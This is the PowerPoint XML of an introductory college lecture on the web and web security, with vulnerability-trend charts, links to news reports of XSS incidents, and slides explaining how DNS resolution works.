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1675" r:id="rId3"/>
    <p:sldId id="1634" r:id="rId4"/>
    <p:sldId id="1677" r:id="rId5"/>
    <p:sldId id="1636" r:id="rId6"/>
    <p:sldId id="1558" r:id="rId7"/>
    <p:sldId id="1579" r:id="rId8"/>
    <p:sldId id="1578" r:id="rId9"/>
    <p:sldId id="1637" r:id="rId10"/>
    <p:sldId id="1640" r:id="rId11"/>
    <p:sldId id="1697" r:id="rId12"/>
    <p:sldId id="1638" r:id="rId13"/>
    <p:sldId id="1639" r:id="rId14"/>
    <p:sldId id="1681" r:id="rId15"/>
    <p:sldId id="1591" r:id="rId16"/>
    <p:sldId id="1680" r:id="rId17"/>
    <p:sldId id="1621" r:id="rId18"/>
    <p:sldId id="1627" r:id="rId19"/>
    <p:sldId id="1630" r:id="rId20"/>
    <p:sldId id="334" r:id="rId21"/>
    <p:sldId id="1622" r:id="rId22"/>
    <p:sldId id="1623" r:id="rId23"/>
    <p:sldId id="1682" r:id="rId24"/>
    <p:sldId id="1683" r:id="rId25"/>
    <p:sldId id="269" r:id="rId26"/>
    <p:sldId id="1641" r:id="rId27"/>
    <p:sldId id="1696" r:id="rId28"/>
    <p:sldId id="313" r:id="rId29"/>
    <p:sldId id="304" r:id="rId30"/>
    <p:sldId id="1695" r:id="rId31"/>
    <p:sldId id="1684" r:id="rId32"/>
    <p:sldId id="340" r:id="rId33"/>
    <p:sldId id="289" r:id="rId34"/>
    <p:sldId id="290" r:id="rId35"/>
    <p:sldId id="1685" r:id="rId36"/>
    <p:sldId id="292" r:id="rId37"/>
    <p:sldId id="1686" r:id="rId38"/>
    <p:sldId id="1687" r:id="rId39"/>
    <p:sldId id="1688" r:id="rId40"/>
    <p:sldId id="1689" r:id="rId41"/>
    <p:sldId id="1690" r:id="rId42"/>
    <p:sldId id="1691" r:id="rId43"/>
    <p:sldId id="55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6" autoAdjust="0"/>
    <p:restoredTop sz="88975" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="109" d="100"/>
          <a:sy n="109" d="100"/>
        </p:scale>
        <p:origin x="9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2602799650043"/>
          <c:y val="7.4490740740740746E-2"/>
          <c:w val="0.85190332458442697"/>
          <c:h val="0.8080406095071449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Sheet1!$B$2:$Y$2</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="24"/>
                <c:pt idx="0">
                  <c:v>257</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>403</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>497</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>381</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>581</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>838</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>894</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>1100</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>894</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>1034</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>1097</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>1219</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>1421</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>1454</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>1597</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>1792</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>2030</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>3167</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>1967</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>1486</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>1480</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>2016</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>2237</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>2285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8F-484C-A59F-16731633C7C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Overflow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Sheet1!$B$3:$Y$3</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="24"/>
                <c:pt idx="0">
                  <c:v>206</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>296</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>430</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>361</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>400</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>645</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>643</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>895</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>655</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>635</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>488</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>452</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>470</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>405</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>403</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>389</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>466</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>1063</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>1586</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>921</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>1074</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>1394</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>1921</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>1793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8F-484C-A59F-16731633C7C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XSS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Sheet1!$B$4:$Y$4</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="24"/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20</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>30</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>27</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>25</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>14</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>10</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>10</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>16</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>18</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>39</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>33</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>82</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>478</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>1023</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>1463</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>1184</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>762</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>568</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>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8F-484C-A59F-16731633C7C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CSRF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Sheet1!$B$5:$Y$5</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="24"/>
                <c:pt idx="5">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>13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9</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>8</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>25</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>11</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>16</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>140</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>325</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>366</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>267</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>220</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>315</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>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8F-484C-A59F-16731633C7C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SQL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Sheet1!$B$6:$Y$6</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="24"/>
                <c:pt idx="0">
                  <c:v>11</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>39</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>76</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>62</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>159</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>636</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>1023</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>755</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>1132</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>998</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>546</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>309</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>257</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>168</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>329</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>253</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>127</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>517</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>530</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>593</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>503</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>743</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>1836</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>2168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8F-484C-A59F-16731633C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059584"/>
        <c:axId val="1038909840"/>
      </c:lineChart>
      <c:catAx>
        <c:axId val="103905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8909840"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="103890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0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361111111111111"/>
          <c:y val="0.10119058034412368"/>
          <c:w val="0.16488014214006233"/>
          <c:h val="0.34114327461644611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Injection (O1)</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>CSRF</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Broken Access Control (O5)</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>Broken Authentication (O2)</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>XSS (O7)</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>Misconfigurations (O6)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0.34</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>0.37</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>0.45</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>0.53</c:v>
                </c:pt>
                <c:pt idx="5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9-5D4E-91AF-0CC1771DC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8615823"/>
        <c:axId val="758622863"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="75861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22863"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="75862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1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8-7B4D-8133-AB309D9C3461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8-7B4D-8133-AB309D9C3461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8-7B4D-8133-AB309D9C3461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8-7B4D-8133-AB309D9C3461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68-7B4D-8133-AB309D9C3461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68-7B4D-8133-AB309D9C3461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68-7B4D-8133-AB309D9C3461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68-7B4D-8133-AB309D9C3461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68-7B4D-8133-AB309D9C3461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68-7B4D-8133-AB309D9C3461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68-7B4D-8133-AB309D9C3461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568-7B4D-8133-AB309D9C3461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68-7B4D-8133-AB309D9C3461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68-7B4D-8133-AB309D9C3461}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:bandFmts/>
        <c:axId val="2125893432"/>
        <c:axId val="2125898968"/>
        <c:axId val="2125904328"/>
      </c:surface3DChart>
      <c:catAx>
        <c:axId val="2125893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5.2387279232668359E-2"/>
              <c:y val="0.8776655418072740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5898968"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="2125898968"/>
        <c:scaling>
          <c:orientation val="minMax"/>
          <c:max val="17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5893432"/>
        <c:crosses val="autoZero"/>
        <c:crossBetween val="midCat"/>
        <c:majorUnit val="2000"/>
        <c:minorUnit val="500"/>
      </c:valAx>
      <c:serAx>
        <c:axId val="212590432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6763937003497398"/>
              <c:y val="0.87945444319460064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5898968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findingctrl.nesta.org.uk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/draw-the-internet/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course website w/ web inspector + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>wireshark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minesweeper in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-standard cookies, third party</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> cookies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TLS = Transport Layer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5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nvd.nist.gov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/vuln/search</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Basic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keywords: "denial", "overflow", "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>", "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>csrf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>", "SQL"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9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www.ptsecurity.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ww-en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/analytics/web-vulnerabilities-2020/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/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Hackers can attack users in 9 out of 10 web applications.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Attacks include redirecting users to a hacker-controlled resource, stealing credentials in phishing attacks, and infecting computers with malware.</a:t>
            </a:r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Unauthorized access to applications is possible on 39 percent of sites.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2019, full control of the system could be obtained on 16 percent of web applications. On 8 percent of systems, full control of the web application server allowed attacking the local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4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scripts can be imported from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> remote origins, have </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>privilieges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> of imported page (not source)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54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Wordpress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (2024): https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.searchenginejournal.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/wordpress-discovers-xss-vulnerability-recommends-updating-to-6-5-2/513501/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cybersecuritynews.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-remains-as-the-most-vulnerability/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Joomla (2024): https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.darkreading.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/application-security/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>joomla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-bugs-open-millions-websites-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rce</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Azure (2023): https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.darkreading.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/application-security/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-azure-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hdinsight</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Zimbra (2023): https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>blog.google</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/threat-analysis-group/zimbra-0-day-used-to-target-international-government-organizations/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Yahoo mail (2016): https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nakedsecurity.sophos.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/2016/01/21/xss-bug-in-yahoo-mail-could-have-let-attackers-take-over-email-accounts/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stored XSS on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (2017):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malicious sellers added scripts to legitimate product listings to redirect users to a spoofed login page that harvested credentials before redirecting users back to a legitimate eBay page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>news.netcraft.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/archives/2017/02/17/hackers-still-exploiting-ebays-stored-xss-vulnerabilities-in-2017.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Expandable ads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> (2018): https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>threatpost.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>/once-popular-online-ad-format-opens-top-tier-sites-to-xss-attacks/137681/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Why not centralize?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Single point of failure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Traffic volume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Distant Centralized Database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Maintenance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Does not scale!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security?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4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5/6/26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classes/cs105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classes/cs105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classes/cs105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chart" Target="../charts/chart3.xml"/><Relationship Id="rId9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s.pomona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    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27: Web and Web Security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F939-13CA-6648-9448-0A8A23F7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BB5-83CB-7542-84FC-A142CCA3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client asks its local nameserver </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the local nameserver asks one of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>root nameservers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108A-3637-B89C-E052-BF560D90D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EE1A-A00D-6ADC-8621-BE419744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have received an email from Vicki Hirales with information for how to complete the course evaluation for this course</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Note: there are some questions on the evaluation about individual instructors </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> please look at who the question is asking about before you answer the question!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>How I use course evaluations: this is my first year here and first time (co-)teaching this class! If there is anything that you would like to tell me about things that you particularly enjoyed or struggled with, both are valuable feedback!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7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BBF13-497F-D54A-BF7D-171515F9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Root Name Servers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A7A6D8-DE37-224B-BDA1-54B04E77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contacted by local name server that can't resolve name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>owned by Internet Corporation for Assigned Names &amp; Numbers (ICANN)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>contacts authoritative name server if name mapping not known, gets mapping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>returns mapping to local name server</a:t>
            </a:r>
          </a:p>
          <a:p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4264C5E-C1DF-F748-A29F-4206E540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29600" cy="30380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E492A-01F6-9F41-8801-D4A12A09AB83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458200" y="59817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F939-13CA-6648-9448-0A8A23F7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BB5-83CB-7542-84FC-A142CCA3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client asks its local nameserver </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the local nameserver asks one of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>root nameservers </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the root nameserver replies with the address of the top level nameserver </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the server then queries that nameserver </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the top level nameserver replies with the address of the authoritative nameserver </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the server then queries that nameserver </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>repeat until host is reached, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: Client wants IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.amazon.com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root server to find com DNS server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.com DNS server to get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>amazon.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> DNS server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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>amazon.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> DNS server to get IP address for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.amazon.com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D2687-8D5F-A924-1F49-37E77199E187}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4132384" y="4076636"/>
            <a:ext cx="1905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cache result. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1399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</a:t>
            </a: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1D851-DACD-DD72-376F-7201B2C002DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="25908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http://www.cs.pomona.edu:80/classes/cs105/index.html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68186-51C2-8F6A-AB85-263FCC7AC615}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4525108" y="2614246"/>
            <a:ext cx="347589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9C4BE-40CB-4961-03EE-A41CD955738C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057400" y="29601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prefix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F3150-F79F-0D85-35E4-CAB07ADDC048}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="785446" y="2614246"/>
            <a:ext cx="3739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3FC5B-CBCC-6D5F-4E8E-FCC905697862}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5869431" y="2965719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suffix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3119F-8534-3C7F-CE37-EB42D1C1F780}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2971800" y="3581400"/>
            <a:ext cx="838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FCA9B-B899-542D-2030-120FA7BC4B81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4267200" y="3575538"/>
            <a:ext cx="3200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EE9A5E-E3C4-3CE0-348F-1630C20F2FA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7581900" y="3575538"/>
            <a:ext cx="4191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BCDC8-FFDE-B4F3-6AB7-DD0DA090E6F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2888198" y="394487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94F53-EA90-9CAF-8F9E-EE15537C1F6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5364698" y="394487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97C77-1259-E066-6525-DFD6B380FBEB}"/>
              </a:ext>
            </a:extLst>
